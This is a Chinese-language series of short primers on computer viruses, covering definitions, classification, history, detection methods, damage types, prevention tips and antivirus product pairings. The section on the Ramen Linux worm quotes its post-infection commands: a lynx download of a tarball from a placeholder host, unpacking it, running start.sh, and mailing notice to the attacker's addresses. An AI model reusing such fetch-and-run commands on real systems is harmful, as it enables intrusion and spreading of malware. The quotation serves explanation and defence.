计算机病毒的故事
计算机病毒小知识速查系列一
计算机病毒的定义
计算机病毒(Computer Virus)在 《中华人民共和国计算机信息系统安全保护条例》中被明确定义为:"指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码"。
计算机病毒的特点
人为的特制程序,具有自我复制能力,很强的感染性,一定的潜伏性,特定的触发性,很大的破坏性。
病毒存在的必然性
计算机的信息需要存取,复制,传送,病毒作为信息的一种形式可以随之繁殖,感染,破坏.并且,当病毒取得控制权之后,他们会主动寻找感染目标,使自己广为流传。
计算机病毒的长期性
计算机操作系统的弱点往往是被病毒利用,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的。提高一定的安全性将使系统多数时间用于病毒检查,系统失去了可用性与实用性,另一方面,信息保密的要求让人在泄密和抓住病毒之间无法选择。
这样,病毒与反病毒将成为一个长期的技术对抗。病毒主要由反病毒软件来对付,而且反病毒技术将成为一种长期的科研做下去。
计算机病毒的产生
病毒不是来源于突发或偶然的原因。
突发的停电和偶然的错误,会在计算机的磁盘和内存中产生一些乱码和随机指令,但这些代码是无序和混乱的。病毒则是一种比较完美的,精巧严谨的代码,按照严格的秩序组织起来,与所在的系统网络环境相适应和配合起来,病毒不会通过偶然形成,并且需要有一定的长度,这个基本的长度从概率上来讲是不可能通过随机代码产生的。
病毒是人为的特制程序
现在流行的病毒是由人为故意编写的,多数病毒可以找到作者信息和产地信息,通过大量的资料分析统计来看,病毒作者主要情况和目的是:一些天才的程序员为了表现自己和证明自己的能力,处于对上司的不满,为了好奇,为了报复,为了祝贺和求爱,为了得到控制口令,为了软件拿不到报酬预留的陷阱等。当然也有因政治,军事,宗教,民族。专利等方面的需求而专门编写的,其中也包括一些病毒研究机构和黑客的测试病毒。
计算机病毒小知识速查系列二
>
计算机病毒分类
根据多年对计算机病毒的研究,按照科学的,系统的,严密的方法,计算机病毒可分类如下:
按照计算机病毒属性的分类
1、病毒存在的媒体
根据病毒存在的媒体,病毒可以划分为网络病毒,文件病毒,引导型病毒。
网络病毒通过计算机网络传播感染网络中的可执行文件,文件病毒感染计算机中的文件(如:COM,EXE,DOC等),引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR),还有这三种情况的混合型,例如:多型病毒(文件和引导型)感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。
2、病毒传染的方法
3、病毒破坏的能力
根据病毒破坏的能力可划分为以下几种:
无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。
无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。
危险型:这类病毒在计算机系统操作中造成严重的错误。
非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。
这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个"Denzuk"病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。
4、病毒特有的算法
根据病毒特有的算法,病毒可以划分为:
伴随型病毒:这一类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名(COM),例如:XCOPY.EXE的伴随体是XCOPY.COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。
"蠕虫"型病毒:通过计算机网络传播,不改变文件和资料信息,利用网络从一台机器的内存传播到其它机器的内存,计算网络地址,将自身的病毒通过网络发送。有时它们在系统存在,一般除了内存不占用其它资源。
寄生型病毒:除了伴随和"蠕虫"型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按算法分为:
练习型病毒:病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。
诡秘型病毒:它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等DOS内部修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。
变型病毒(又称幽灵病毒):这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。
计算机病毒小知识速查系列三
>
计算机病毒的发展
在病毒的发展史上,病毒的出现是有规律的,一般情况下一种新的病毒技术出现后,病毒迅速发展,接着反病毒技术的发展会抑制其流传。操作系统进行升级时,病毒也会调整为新的方式,产生新的病毒技术。它可划分为:
1、DOS引导阶段
1987年,计算机病毒主要是引导型病毒,具有代表性的是"小球"和"石头"病毒。
当时得计算机硬件较少,功能简单,一般需要通过软盘启动后使用。引导型病毒利用软盘得启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年,引导型病毒发展为可以感染硬盘,典型的代表有"石头2"。
2、DOS可执行阶段
1989年,可执行文件型病毒出现,它们利用DOS系统加载执行文件的机制工作,代表为"耶路撒冷","星期天"病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。1990年,发展为复合型病毒,可感染COM和EXE文件。
3、伴随、批次型阶段
1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。具有代表性的是"金蝉"病毒,它感染EXE文件时生成一个和EXE同名的扩展名为COM伴随体;它感染COM文件时,改为原来的COM文件为同名的EXE文件,在产生一个原名的伴随体,文件扩展名为COM。这样,在DOS加载文件时,病毒就取得控制权。这类病毒的特点是不改变原来的文件内容,日期及属性,解除病毒时只要将其伴随体删除即可。在非DOS操作系统中,一些伴随型病毒利用操作系统的描述语言进行工作,具有典型代表的是"海盗旗"病毒,它在得到执行时,询问用户名称和口令,然后返回一个出错信息,将自身删除。批次型病毒是工作在DOS下的和"海盗旗"病毒类似的一类病毒。
4、幽灵、多形阶段
1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如"一半"病毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。多形型病毒是一种综合性病毒,它既能感染引导区又能感染程序区,多数具有解码算法,一种病毒往往要两段以上的子程序方能解除。
5、生成器、变体机阶段
1995年,在汇编语言中,一些数据的运算放在不同的通用寄存器中,可运算出同样的结果,随机的插入一些空操作和无关指令,也不影响运算的结果,这样,一段解码算法就可以由生成器生成。当生成的是病毒时,这种复杂的称之为病毒生成器和变体机就产生了。具有典型代表的是"病毒制造机"VCL,它可以在瞬间制造出成千上万种不同的病毒,查解时就不能使用传统的特征识别法,需要在宏观上分析指令,解码后查解病毒。变体机就是增加解码复杂程度的指令生成机制。
6、网络、蠕虫阶段
1995年,随着网络的普及,病毒开始利用网络进行传播,它们只是以上几代病毒的改进。在非DOS操作系统中,"蠕虫"是典型的代表,它不占用除内存以外的任何资源,不修改磁盘文件,利用网络功能搜索网络地址,将自身向下一地址进行传播,有时也在网络服务器和启动文件中存在。
7、视窗阶段
1996年,随着Windows和Windows95的日益普及,利用Windows进行工作的病毒开始发展,它们修改(NE,PE)文件,典型的代表是DS.3873,这类病毒的急智更为复杂,它们利用保护模式和API调用接口工作,解除方法也比较复杂。
8、宏病毒阶段
1996年,随着Windows Word功能的增强,使用Word宏语言也可以编制病毒,这种病毒使用类Basic语言,编写容易,感染Word文档文件。在Excel和AmiPro出现的相同工作机制的病毒也归为此类。由于Word文档格式没有公开,这类病毒查解比较困难。
9、互连网阶段
1997年,随着因特网的发展,各种病毒也开始利用因特网进行传播,一些携带病毒的数据包和邮件越来越多,如果不小心打开了这些邮件,机器就有可能中毒。
10 Java、邮件炸弹阶段
1997年,随着万维网上Java的普及,利用Java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒。还有一些利用邮件服务器进行传播和破坏的病毒,例如Mail-Bomb病毒,它就严重影响因特网的效率。
计算机病毒小知识速查系列四
计算机病毒的危害性
1988年11月2日下午5时1分59秒,美国康奈尔大学的计算机科学系研究生,23岁的莫里斯(Morris)将其编写的蠕虫程序输入计算机网络。在几小时内导致因特网堵塞。这个网络连接着大学、研究机关的155000台计算机,使网络堵塞,运行迟缓。这件事就像是计算机界的一次大地震,引起了巨大反响,震惊全世界,引起了人们对计算机病毒的恐慌,也使更多的计算机专家重视和致力于计算机病毒研究。1988年下半年,我国在统计局系统首次发现了"小球"病毒,它对统计系统影响极大。最近的CIH病毒,美丽杀病毒等等都在全世界范围内造成了很大的经济和社会损失。
可以看到,随着计算机和因特网的日益普及,计算机病毒和崩溃,重要数据遭到破坏和丢失,会造成社会财富的巨大浪费,甚至会造成全人类的灾难。
国内外防毒行业发展
随着计算机技术发展得越来越快,使得计算机病毒技术与计算机反病毒技术的对抗也越来越尖锐。据统计,现在基本上每天都要出现几十种新病毒,其中很多病毒的破坏性都非常大,稍有不慎,就会给计算机用户造成严重后果。下面我们以介绍国内防毒行业的发展为主。
我国计算机反病毒技术的研究和发展,是从研制防病毒卡开始的。防病毒卡的核心实际上是一个软件,只不过将其固化在ROM中。它的出发点是想以不变应万变,通过动态驻留内存来监视计算机的运行情况,根据总结出来的病毒行为规则和经验来判断是否有病毒活动,通过截获中断控制权规则和经验来判定是否有病毒活动,并可以截获中断控制权来使内存中的病毒瘫痪,使其失去传染别的文件和破坏信息资料的能力,这就是防病毒卡"带毒运行"功能的基本原理。防病毒卡主要的不足是与正常软件特别是国产的软件有不兼容的现象,误报、漏报病毒现象时有发生,降低了计算机运行速度,升级困难等。从防病毒技术上说是不成熟的,病毒知变万化,技术手段越来越高,企图以一种不变的技术对付病毒是不可能的。防病毒卡的动态监测技术、病毒行为规则的研究,对于发现计算机病毒起了很大的作用,这些技术是防病毒卡换精华。但是作为一个产品,只有这部分技术是远远不够的,这部分技术也没有太大的实际意义,所以防病毒卡的使用者在减少。
随着防病毒卡的衰落,解病毒软件则日益风行。解病毒软件最重要的功能是将病毒彻底干净地予以清除,如果说防病毒卡是治标的话,那么解病毒软件则是治本。
第一代反病毒技术是采取单纯的病毒特征判断,将病毒从带毒文件中清除掉。这种方式可以准确地清除病毒,可靠性很高。后来病毒技术发展了,特别是加密和变形技术的运用,使得这种简单的静态扫描方式失去了作用。随之而来的反病毒技术也发展了一步。
第二代反病毒技术是采用静态广谱特征扫描方法检测病毒,这种方式可以更多地检测出变形病毒,但另一方面误报率也提高,尤其是用这种不严格的特征判定方式去清除病毒带来的风险性很大,容易造成文件和数据的破坏。所以说静态防病毒技术也有难以克服的缺陷。
第三代反病毒技术的主要特点是将静态扫描技术和动态仿真跟踪技术结合起来,将查找病毒和清除病毒合二为一,形成一个整体解决方案,能够全面实现防、查、消等反病毒所必备的各种手段,以驻留内存方式防止病毒的入侵,凡是检测到的病毒都能清除,不会破坏文件和数据。随着病毒数量的增加和新型病毒技术的发展,静态扫描技术将会使查毒软件速度降低,驻留内存防毒模块容易产生误报。
第四代反病毒技术则是针对计算机病毒的发展而基于病毒家族体系的命名规则、基于多位CRC校验和扫描机理,启发式智能代码分析模块、动态数据还原模块(能查出隐蔽性极强的压缩加密文件中的病毒)、内存解毒模块、自身免疫模块等先进的解毒技术,较好的解决了以前防毒技术顾此失彼、此消彼长的状态。
计算机病毒小知识速查系列五
病毒检测的方法
在与病毒的对抗中,及早发现病毒很重要。早发现,早处置,可以减少损失。检测病毒方法有:特征代码法、校验和法、行为监测法、软件模拟法, 这些方法依据的原理不同,实现时所需开销不同,检测范围不同,各有所长。
特征代码法
特征代码法被早期应用于SCAN、CPAV等著名病毒检测工具中。国外专家认为特征代码法是检测已知病毒的最简单、开销最小的方法。
特征代码法的实现步骤如下:
采集已知病毒样本,病毒如果既感染COM文件,又感染EXE文件,对这种病毒要同时采集COM型病毒样本和EXE型病毒样本。
在病毒样本中,抽取特征代码。依据如下原则:
抽取的代码比较特殊,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开销。如果一种病毒的特征代码增长一字节,要检测3000种病毒,增加的空间就是3000字节。在保持唯一性的前提下,尽量使特征代码长度短些,以减少空间与时间开销。
在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码。将特征代码纳入病毒数据库。
打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。
采用病毒特征代码法的检测工具,面对不断出现的新病毒,必须不断更新版本,否则检测工具便会老化,逐渐失去实用价值。病毒特征代码法对从未见过的新病毒,自然无法知道其特征代码,因而无法去检测这些新病毒。
特征代码法的优点是:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理。其缺点是:不能检测未知病毒、搜集已知病毒的特征代码,费用开销大、在网络上效率低(在网络服务器上,因长时间检索会使整个网络性能变坏)。
其特点:
A.速度慢。随着病毒种类的增多,检索时间变长。如果检索5000种病毒,必须对5000个病毒特征代码逐一检查。如果病毒种数再增加,检病毒的时间开销就变得十分可观。此类工具检测的高速性,将变得日益困难。
B.误报警率低。
非C.不能检查多形性病毒。特征代码法是不可能检测多态性病毒的。国外专家认为多态性病毒是病毒特征代码法的索命者。
D.不能对付隐蔽性病毒。隐蔽性病毒如果先进驻内存,后运行病毒检测工具,隐蔽性病毒能先于检测工具,将被查文件中的病毒代码剥去,检测工具的确是在检查一个虚假的"好文件",而不能报警,被隐蔽性病毒所蒙骗。
校验和法
将正常文件的内容,计算其校验和,将该校验和写入文件中或写入别的文件中保存。在文件使用过程中,定期地或每次使用文件前,检查文件现在内容算出的校验和与原来保存的校验和是否一致,因而可以发现文件是否感染,这种方法叫校验和法,它既可发现已知病毒又可发现未知病毒。在SCAN和CPAV工具的后期版本中除了病毒特征代码法之外,还纳入校验和法,以提高其检测能力。
这种方法既能发现已知病毒,也能发现未知病毒,但是,它不能识别病毒类,不能报出病毒名称。由于病毒感染并非文件内容改变的唯一的非他性原因,文件内容的改变有可能是正常程序引起的,所以校验和法常常误报警。而且此种方法也会影响文件的运行速度。
病毒感染的确会引起文件内容变化,但是校验和法对文件内容的变化太敏感,又不能区分正常程序引起的变动,而频繁报警。用监视文件的校验和来检测病毒,不是最好的方法。
这种方法遇到下述情况:已有软件版更新、变更口令、修改运行参数、校验和法都会误报警。
校验和法对隐蔽性病毒无效。隐蔽性病毒进驻内存后,会自动剥去染毒程序中的病毒代码,使校验和法受骗,对一个有毒文件算出正常校验和。
运用校验和法查病毒采用三种方式:
①在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。
②在应用程序中,放入校验和法自我检查功能,将文件正常状态的校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。
③将校验和检查程序常驻内存,每当应用程序开始运行时,自动比较检查应用程序内部或别的文件中预先保存的校验和。
校验和法的优点是:方法简单能发现未知病毒、被查文件的细微变化也能发现。其缺点是:发布通行记录正常态的校验和、会误报警、不能识别病毒名称、不能对付隐蔽型病毒。
行为监测法
利用病毒的特有行为特征性来监测病毒的方法,称为行为监测法。通过对病毒多年的观察、研究,有一些行为是病毒的共同行为,而且比较特殊。在正常程序中,这些行为比较罕见。当程序运行时,监视其行为,如果发现了病毒行为,立即报警。
这些做为监测病毒的行为特征如下:
A.占有INT 13H
所有的引导型病毒,都攻击Boot扇区或主引导扇区。系统启动时,当Boot扇区或主引导扇区获得执行权时,系统刚刚开工。一般引导型病毒都会占用INT 13H功能,因为其他系统功能未设置好,无法利用。引导型病毒占据INT 13H功能,在其中放置病毒所需的代码。
B.改DOS系统为数据区的内存总量
病毒常驻内存后,为了防止DOS系统将其覆盖,必须修改系统内存总量。
C.对COM、EXE文件做写入动作
病毒要感染,必须写COM、EXE文件。
D.病毒程序与宿主程序的切换
染毒程序运行中,先运行病毒,而后执行宿主程序。在两者切换时,有许多特征行为。
行为监测法的长处:可发现未知病毒、可相当准确地预报未知的多数病毒。行为监测法的短处:可能误报警、不能识别病毒名称、实现时有一定难度。
软件模拟法
多态性病毒每次感染都变化其病毒密码,对付这种病毒,特征代码法失效。因为多态性病毒代码实施密码化,而且每次所用密钥不同,把染毒的病毒代码相互比较,也无法找出相同的可能做为特征的稳定代码。虽然行为检测法可以检测多态性病毒,但是在检测出病毒后,因为不知病毒的种类,难于做消毒处理。
计算机病毒小知识速查系列六
计算机病毒的破坏行为
计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的技术能量。数以万计、不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,难以做全面的描述。根据有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下:
1.攻击系统数据区,攻击部位包括:
硬盘主引寻扇区、Boot扇区、FAT表、文件目录。一般来说,攻击系统数据区的病毒是恶性病毒,受损的数据不易恢复。
2.攻击文件
病毒对文件的攻击方式很多,可列举如下:删除、改名、替换内容、丢失部分程序代码、内容颠倒、写入时间空白、变碎片、假冒文件、丢失文件簇、丢失数据文件。
3.攻击内存
内存是计算机的重要资源,也是病毒的攻击目标。病毒额外地占用和消耗系统的内存资源,可以导致一些大程序受阻。病毒攻击内存的方式如下:占用大量内存、改变内存总量、禁止分配内存、蚕食内存。
4.干扰系统运行
病毒会干扰系统的正常运行,以此做为自己的破坏行为。此类行为也是花样繁多,可以列举下述诸方式:不执行命令、干扰内部命令的执行、虚假报警、打不开文件、内部栈溢出、占用特殊数据区、换现行盘、时钟倒转、重启动、死机、强制游戏、扰乱串并行口。
5.速度下降
病毒激活时,其内部的时间延迟程序启动。在时钟中纳入了时间的循环计数,迫使计算机空转,计算机速度明显下降。
6.攻击磁盘
攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节。
7.扰乱屏幕显示
病毒扰乱屏幕显示的方式很多,可列举如下:字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、吃字符。
8.键盘
病毒干扰键盘操作,已发现有下述方式:响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱。
9.喇叭
许多病毒运行时,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。已发现的有以下方式:演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声
10.攻击CMOS
在机器的CMOS区中,保存着系统的重要数据。例如系统时钟、磁盘类型、内存容量等,并具有校验和。有的病毒激活时,能够对CMOS区进行写入动作,破坏系统CMOS中的数据。
11.干扰打印机
假报警、间断性打印、更换字符。
计算机病毒小知识速查系列七
计算机病毒的防治策略
计算机病毒的防治要从防毒、查毒、解毒三方面来进行;系统对于计算机病毒的实际防治能力和效果也要从防毒能力、查毒能力和解毒能力三方面来评判。
"防毒"是指根据系统特性,采取相应的系统安全措施预防病毒侵入计算机。"查毒"是指对于确定的环境,能够准确地报出病毒名称,该环境包括,内存、文件、引导区(含主导区)、网络等。"解毒"是指根据不同类型病毒对感染对象的修改,并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括:内存、引导区(含主引导区)、可执行文件、文档文件、网络等。
防毒能力是指预防病毒侵入计算机系统的能力。通过采取防毒措施,应可以准确地、实时地监测预警经由光盘、软盘、硬盘不同目录之间、局域网、因特网(包括FTP方式、E-MAIL、HTTP方式)或其它形式的文件下载等多种方式进行的传输;能够在病毒侵入系统是发出警报,记录携带病毒的文件,即时清除其中的病毒;对网络而言,能够向网络管理员发送关于病毒入侵的信息,记录病毒入侵的工作站,必要时还要能够注销工作站,隔离病毒源。
查毒能力是指发现和追踪病毒来源的能力。通过查毒应该能准确地发现计算机系统是否感染有病毒,并准确查找出病毒的来源,并能给出统计报告;查解病毒的能力应由查毒率和误报率来评判。
解毒能力是指从感染对象中清除病毒,恢复被病毒感染前的原始信息的能力;解毒能力应用解毒率来评判。
计算机病毒小知识速查系列八
Ramen是Linux的“病”而非“毒”
前一段时间,一些媒体报告:“世界上第一个Linux病毒Reman已经出现”。这引起我极大的兴趣,并想一睹Reman的庐山真面目。但是,当我得到该病毒的有关资料和样本之后发现:Reman并不能严格地称为病毒,它实际上只是一个古老的、在Unix/Linux世界早已存在的“缓冲区溢出”攻击程序。几乎所有Unix/Linux版本中都或多或少地存在这样的问题。第一次此种类型的攻击(Morris Worm)是在十多年前,Reman这种“缓冲区溢出”攻击程序并不是在今天的世界第一次出现。事实上,针对Windows98/NT的缓冲区溢出攻击也是很常见的,且并不被称为病毒。
缓冲区溢出的原理是:向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,从而引起程序运行失败。因为自动变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,从而无法从发生溢出的函数正常返回(返回地址往往是一个无效的地址)。在这样的情况下,系统一般报告:“core dump”或 “segment fault”。严重的情况是:如果覆盖缓冲区的是一段精心设计的机器指令序列,它可能通过溢出,改变返回地址,将其指向自己的指令序列,从而改变该程序的正常流程。这段精心设计的指令一般的目的是:“/bin/sh”,所以这段代码被称为“shell code”。通过这样的溢出可以得到一个shell,仅此而已。但是,如果被溢出是一个suid root程序,得到的将是一个root shell。这样,机器的控制权已经易手,此后发生的任何事情都是合理的。
下面我们回到Reman。它首先对网络上的主机进行扫描,通过两个普通的漏洞进入系统,获取root权限,然后从源主机复制自身,以继续扫描网上其他服务器。对于Red Hat 6.2 来讲,如果攻击成功,它会做以下工作:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen。tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen。tar;./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com
很明显,Reman只是一个自动化了的缓冲区溢出程序,而且是很普通的一种。目前缓冲区溢出攻击是非常普遍的一种攻击。黑客网站对各类系统的漏洞的发布几乎每日更新。这种攻击方式并不是不可避免,目前已有很多对付该类攻击的方案。需要指出的是:Reman这样的攻击程序对红旗Linux的攻击是不可能成功的,因为红旗Linux全线产品都考虑了“缓冲区溢出”这样的安全问题。
计算机病毒小知识速查系列九
专家谈计算机病毒高发季节的防护
4月是计算机病毒的高发季节。通过网络新途径,病毒早已突破了地域界限,飞速传播,预计本月有至少20余种电脑病毒将向我们的电脑发起猛攻,其中尤以4月26日的CIH病毒最为险恶。
八大“前兆”
“计算机‘发病’也有预兆,及早注意完全可以避免。”上海市信息办信息安全专家石坚提醒市民注意以下八大“前兆”:计算机经常性出现无缘无故的死机;计算机系统无法正常启动或启动变慢;键盘、显示有异常现象;运行速度明显变慢;以前能正常运行的软件经常发生内存不足的错误;文件的长度、内容、属性和日期等无故改变;经常丢失文件、丢失数据;自动链接到一些陌生网站。“当出现上述情况时,说明您的计算机很可能已经感染了病毒。”“临床”病征石坚还列出了病毒发作时的病症:如“胡言乱语”——提示一些不相干的话,发出一段音乐,产生特定的图像,硬盘灯不断闪烁;“胡搅蛮缠”——突然进行游戏算法,鼠标自己在动,Windows桌面图标乱动,系统自动发送电子邮件。“病情”严重时计算机还会突然死机或重新启动。
预防“接种”
市计算机病毒防范服务中心82000热线的专家专为电脑用户开出了春季预防“药方”,共计8味“良药”:个人计算机乃至整个网络都应安装实时防病毒软件,以建立完整的网络防毒架构;及时更新杀毒软件;不要打开任何附件后缀为VBS、CHM、PIF、SCR、SHS的文件,对附件后缀为EXE与COM的文件应先确认再打开;来历不明的邮件最好删除或先用防病毒软件检查;不要隐藏系统中已知文件类型的扩展名;所有主题有“FW:”的信件都要提高警惕;重要资料应作好备份;用户应使用最新版的OutlookExpress安全修补程序或将浏览器设成最高安全性。专家还欢迎市民带着问题参加本周六在上海图书馆知识广场举行的大型咨询活动。
计算机病毒小知识速查系列十
及时升级反病毒软件的利器
目前有许多电脑病毒发作特点不是快速而猛烈的,而是缓慢而狡猾的,有时还具有使用加密插件自动升级的能力,反病毒专家认为这些发作缓慢的病毒有非同寻常的驻留本领,一旦发作将对计算机更加危险。正是由于病毒的日益增多,因此反病毒软件也得到了大家的欢迎。但现在的病毒能够自动地不断升级,这就要求我们必须及时地对反病毒软件进行升级发展,只有这样才能使计算机更加安全地使用。但对反病毒软件进行升级也不是一件很容易的事情,除了要确保它的时效性外,我们还必须考虑到完成该工作所要的时间,以及由此带来的潜在的危险等因素,因为一点点的时间误差就可能给自己的计算机造成难以弥补的损失。那么我们该如何才能及时准确地升级反病毒软件呢?下面笔者就以McAfee系列的反病毒软件为例,和大家谈谈使用McAfee的ePo策略来在工作中及时完成对反病毒软件的升级工作。
McAfee ePo是英文McAfee ePolicy Orchestrator的缩写,它是一个与McAfee反病毒软件结合比较紧密的综合型管理工具,该工具一般具有智能组织用户、策略的实时变化、增强的报告、安全的策略管理以及无缝升级反病毒软件等特征,它可以帮助我们及时完成反病毒软件的分配工作,该项功能可以使我们这些普通的网民省却了购买或寻找第三方软件的麻烦,同样也会降低工作中可能存在的安装和升级的复杂性,更重要的一点就是ePo还可以与市面上流行的第三方软件分配工具进行高效协调地工作,另外ePo还能够监控并且改变用户机器的配置,获得状态和事件的增强报告,追踪病毒感染率和纠正行动。
对于我们远程用户来说,由于ePo是通过安全的http协议进行通信的,这样我们就可以通过因特网或者本地的局域网来远程管理自己的计算机系统,管理时,我们首先与ePo服务器建立连接,一旦与服务器连接成功后,ePo代理会自动连接到服务器并把自上一次通信以来所收集到的所有存储在本地的信息传送到服务器上。另外ePo设计合理的体系结构使得一台ePo服务器能够管理另外的一台和多台ePo服务器,这为ePo生成分组分级的报告打下了良好的基础,同时ePo还具备26个预设报告和无限的定置报告能力,这使得生成的数据报告具有很强的数据加工能力,比起其他软件的记流水帐的做法要强多了。如果病毒发作,ePo能将所有的McAfee反病毒软件设定为全企业的自动更新,启动一个手动扫描,并生成详细报告来查明侵入地点以及确认传播的方式和速度;当然ePo最受用户欢迎的是它支持在线自动更新,利用该功能我们可以花最少的钱和时间来获取及时地升级反病毒软件。
计算机病毒小知识速查系列十一
合理搭配使用杀病毒软件
面对如今层出不穷的各类杀毒软件,恐怕不单是“菜鸟”们找不着北,连一些“老鸟”也颇感头痛。由于个人机器的性能、用途、习惯、兴趣甚至心态的不同,形成了自己的应用软件搭配风格,但几乎很少有朋友注意到这其中的技巧。
一、使用杀毒软件的几个误区
很多朋友认为自己的机器里头装了杀毒软件就万事大吉。其实到目前为止,世界上没有一家杀毒软件生产商敢承诺可以查杀所有已知病毒,这就意味着即便你装了杀毒软件,绝非从此就高枕无忧。我所见到的装备了杀毒软件的机器仍然被病毒侵蚀的案例不下10起。所以,在大家防范于未然的同时,合理搭配使用杀毒软件也是必不可少的。 为数不少的朋友总是喜欢下载一大堆最新的却是连自己也不知道如何用的共享杀毒软件,甚至装了又删--直接后果是造成系统和其中某些程序产生冲突,有使系统崩溃的危险;注册表也因此会凌乱、臃肿;系统文件有可能被误删等,威胁着整个系统的安全。
许多人只注意在Windows系统下按要求安装杀毒软件,却忽略了DOS杀毒盘的重要性。病毒一旦感染了Windows系统应用程序,必须要在DOS下才能杀除。所以,朋友们一定要注意DOS应急盘的保护和更新。
??
二、如何合理搭配使用杀毒软件
大家都知道同时开启两套杀毒软件的实时监控有可能会引起冲突,但是在机器上安装多套杀毒软件的同时只开启一套杀毒软件的实时监控程序却是行得通的。这样一来,不但可以扬长避短发挥各自软件的优势,而且还可以交叉查杀病毒,极大的增强了机器的安全系数。如果您有条件,极力推荐!
合理搭配前对各种杀毒软件的特性要有必要的了解。目前的商业杀毒软件分为国产和欧美两大阵营。客观的讲,目前国产杀毒软件的无论是整体功能设计、查杀毒数量等等还是与国际先进水平有一定差距,但国产品牌在价格、服务等方面还是有优势的。这也是国产杀毒软件能占据80%国内市场份额的重要原因。
在国产品牌中,瑞星对新近出现的流行病毒的查杀效果很明显,但由于其是基于235K的病毒库,所以查杀毒数量始终是瑞星的瓶颈;KV3000对比起KV300有了质的飞跃,对各种病毒具有广泛查杀性,但是其更新速度稍慢,对新病毒的反应也不够快。这正好和瑞星有了互补的可能;金山毒霸和KILL也是各有优势。
国际品牌里首推McAfee。作为全球拥有7000万用户、号称世界第一品牌的杀毒软件,McAfee的确是做得不错:界面设计精致、合理,程序运行稳定,查杀毒数量在57000种以上。还有一点很重要:McAfee算是国际品牌里头最体贴中国用户的杀毒软件----尽管性能十分出色,但是其对资源的占用率还是在大多数中国用户的承受范围以内。PC-cillin也是一款很大气的杀毒软件,基本性能与McAfee比较类似,但在查杀毒的数量上较为落后。熊猫卫士和诺顿最大的相似之处是它们的实时监控程序占用了巨大的资源,如果您的机器是99年以前配置的话,基本上可以打消去试试这两款软件的念头了。当然,作为享有良好声誉的世界品牌,诺顿的综合实力也是出类拔萃的。熊猫卫士是一款非常好用的软件,哪怕您是头一次坐在电脑面前,您也不会对它有手足无措的感觉。
三、杀毒软件实用搭配方案
1.McAfee5.13+瑞星。利用McAfee极强的综合实力,发挥其在系统检测、对宏病毒的侦测、E-mail监控、实时监控恶意JAVA和ActiveX控件等方面的优势,加上McAfee本身具有的强大的查杀毒能力,辅之以对国内新流行病毒较为敏感、在DOS下非常易用(全中文界面、支持鼠标)且查杀毒性能很好的瑞星,这样一对组合应该说是非常理想的。经测试,在随系统只启动McAfee实时监控的前提下,建立在Windows98上的这一对组合没有任何冲突。
